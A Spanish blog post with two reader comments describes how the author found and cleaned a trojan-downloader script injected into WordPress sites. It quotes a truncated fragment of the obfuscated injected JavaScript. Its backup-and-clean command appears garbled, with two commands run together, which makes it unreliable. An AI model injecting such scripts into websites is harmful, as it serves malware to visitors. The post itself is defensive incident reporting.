Un comentario me alertó ayer de un posible fallo de seguridad en el blog. En cuanto lo vi me fui a ver el código HTML de la página en cuestión y me di cuenta de que tenía un extraño script al final del fichero. Me puse a investigar y me di cuenta de que el extraño script aparecía también en el fichero PHP original. Es más, observé que no era el único blog o página que se había visto perjudicado.
El código en concreto era algo así como:
<!-- ad --><script> wlhkw=(.9,"t"); wgkqx=(87.,3); uuqis=(8107.,34); cjaqx=(57.,"<"+"i"+"f"+"r"+""); eyocl=(6e0>=229.?621.:652); ...... <!-- /ad -->
Con la ayuda del usuario Coyote Cabreado, autor del comentario, averigüé que se trataba de un troyano y que no había forma de desinfectarlo, pues es un malware bastante nuevo (Trojan-Downloader.JS.LuckySploit). Un par de comandos de Linux me dieron una idea de cuantos ficheros se habían visto afectados: 847 infecciones, aunque la mayoría de ellas eran ficheros de la caché de wordpress.
Lo siguiente fue tratar de situar en el tiempo la intrusión. Por la fecha de modificación de los ficheros afectados, averiguamos que la infección de todos los ficheros había sido entre las 14:35 y las 15:25 del lunes día 9 de marzo. La fecha en la que Kasperky data la detección del troyano es justo un día después, el 10 de marzo a las 10:13. Es decir, fuimos una de las primeras víctimas del troyano. Por otra parte hemos localizado una lista de IPs sospechosas que tuvieron accesos anormales entorno a esas horas por si tenemos que realizar otro tipo de acciones.
Por último, teníamos que desinfectar los ficheros afectados. Para ello Marcis creó un script en PHP que podéis usar si estáis afectados. Como no nos responsabilizamos de lo que pueda ocurrir por usarlo, antes de nada, crea una copia de seguridad de todos tus datos:
find -name index.php|xargs tar cvf backup.tar php remove_ad clean .
En cuanto a los problemas que ha podido causar el troyano, aparte de lo que pueda haber afectado a los usuarios de las webs durante estas 48 horas, ha paralizado Tiempo de Crisis debido a un error en el feed y ha tumbado un wiki interno.
¿Alguien sabe que es lo que hace este troyano? Hace años trabajé en una empresa de seguridad que justamente se centraba en el mundo del malware. En esa época no habría dudado y me habría puesto a destripar el troyano, pero ahora tengo mejores cosas que hacer.
2 respuestas a «Ataque de un troyano»
Para ser precisos, alguien ha hecho un ataque de inyección de código en tus blogs (algo parecido a estos http://wordpress.org/support/topic/216494 ) que hace que los usuarios que visitan la página se descarguen el troyano (por el comentario de coyotecabreado que apuntas, los que reciben el troyano son los usuarios, y además los de windows, acabo de visitar otra página con un código parecido con safari4 en mac y no ha pasado nada).
Que curioso, yo que creía que a ti no te pasaban estas cosas. Es igual, me alegro de que ya lo hayáis solucionado 🙂
Es lo que tiene estar tanto tiempo desconectado del mundo de los virus y demás.. que cuando menos te lo esperas.. ZASCA!! 😀